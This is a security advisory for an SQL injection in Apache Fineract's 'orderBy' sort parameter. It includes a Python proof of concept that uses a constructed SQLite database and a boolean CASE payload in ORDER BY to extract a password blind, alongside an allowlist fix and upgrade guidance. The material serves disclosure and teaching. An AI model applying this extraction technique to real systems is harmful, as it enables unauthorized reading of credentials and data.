CVE-2018-1291: Apache Fineract SQL Injection | Risk: Critical | 0day ID: 0DAY-176115 | Date: 2018-04-29
Apache Fineract exposes a number of REST endpoints for querying domain-specific
entities. These endpoints accept an ‘orderBy’ query parameter (with the associated “order”
sort-direction parameter) whose value is appended directly to the generated SQL statement. An attacker or
low-privileged user can craft the ‘orderBy’ value, by way of the “order” parameter, so that the injected SQL
reads or updates data the user is not authorized to access.
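The following is an added example, not code from the advisory or from Apache Fineract itself. It reproduces the pattern described above against an in-memory SQLite database: the sort column and direction from the request are concatenated into the query, so a caller who is only allowed to list clients of one office can use the ORDER BY expression as a boolean oracle and read a value from a table they cannot query directly. The hardened variant shows the fix that parameter binding cannot provide (identifiers cannot be bound), namely an allowlist of sortable columns and directions. Table and column names (m_client, m_appuser, display_name, password) and the rows are constructed for the example.

```python
import sqlite3

# Allowlist of identifiers the caller may sort on. Identifiers cannot be bound as
# SQL parameters, so validation against a fixed set is the correct control here.
ALLOWED_ORDER_COLUMNS = {"id", "display_name", "office_id"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def make_db():
    """Constructed sample schema: a client table the caller may read and a user
    table holding a secret the caller must not be able to read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE m_client(id INTEGER, display_name TEXT, office_id INTEGER);
        CREATE TABLE m_appuser(id INTEGER, username TEXT, password TEXT);
        INSERT INTO m_client VALUES (1, 'zed', 1), (2, 'amy', 1), (3, 'bob', 2);
        INSERT INTO m_appuser VALUES (1, 'admin', 's3cr3t');
    """)
    return conn


def search_clients_vulnerable(conn, office_id, order_by, sort_order):
    """Mirrors the flawed pattern: WHERE value is bound, but the sort column and
    direction taken from the request are appended verbatim to the statement."""
    sql = ("SELECT id, display_name FROM m_client WHERE office_id = ? "
           "ORDER BY " + order_by + " " + sort_order)
    return [row[0] for row in conn.execute(sql, (office_id,)).fetchall()]


def search_clients_hardened(conn, office_id, order_by, sort_order):
    """Same query, but the identifier and direction are checked against allowlists
    before they are interpolated, so no attacker-controlled SQL reaches the engine."""
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unsupported orderBy column: {order_by!r}")
    direction = sort_order.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported sort order: {sort_order!r}")
    sql = (f"SELECT id, display_name FROM m_client WHERE office_id = ? "
           f"ORDER BY {order_by} {direction}")
    return [row[0] for row in conn.execute(sql, (office_id,)).fetchall()]


def hardened_rejects(conn, order_by, sort_order):
    """True if the hardened endpoint refuses the given orderBy/order pair."""
    try:
        search_clients_hardened(conn, 1, order_by, sort_order)
    except ValueError:
        return True
    return False


def leak_secret(conn, office_id=1, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Blind, boolean-based extraction through the ORDER BY clause. For office 1 the
    rows sort as [1, 2] when the expression is `id` and as [2, 1] when it is `-id`;
    a CASE expression chooses between them based on one character of a row in
    m_appuser, so the visible row order leaks that character."""
    recovered = ""
    while True:
        pos = len(recovered) + 1
        for ch in alphabet:
            payload = ("(CASE WHEN substr((SELECT password FROM m_appuser WHERE id = 1), "
                       f"{pos}, 1) = '{ch}' THEN id ELSE -id END)")
            if search_clients_vulnerable(conn, office_id, payload, "ASC") == [1, 2]:
                recovered += ch
                break
        else:
            # No candidate matched: substr() returned '' past the end of the value.
            return recovered


if __name__ == "__main__":
    db = make_db()
    print("legitimate sort:", search_clients_vulnerable(db, 1, "display_name", "ASC"))
    print("leaked via orderBy:", leak_secret(db))
    print("hardened rejects payload:", hardened_rejects(db, "(CASE WHEN 1=1 THEN id ELSE -id END)", "ASC"))
```

The oracle needs only two rows whose natural order differs from their reversed order, which is why the constructed office holds ids 1 and 2 with names that do not sort in id order. Stacked statements (the "update" half of the advisory's impact) are not demonstrated here; whether they are reachable depends on the database driver's multi-statement settings.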
Apache Fineract can be deployed in any environment: cloud or on-premise, online or offline, mobile or PC. It is extensible enough to support any organizational type or delivery channel, and flexible enough to support any product, service, or methodology. For any organization, big or small, it provides the client data management, loan and savings portfolio management, integrated real-time accounting, and social and financial reporting needed to bring digital financial services to a modern connected world. It serves financial institutions and service providers offering financial services to the world’s 2 billion underbanked and unbanked.
The Apache Software Foundation
Mitigation: all users should upgrade to Apache Fineract 1.1.0.
Versions affected: Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating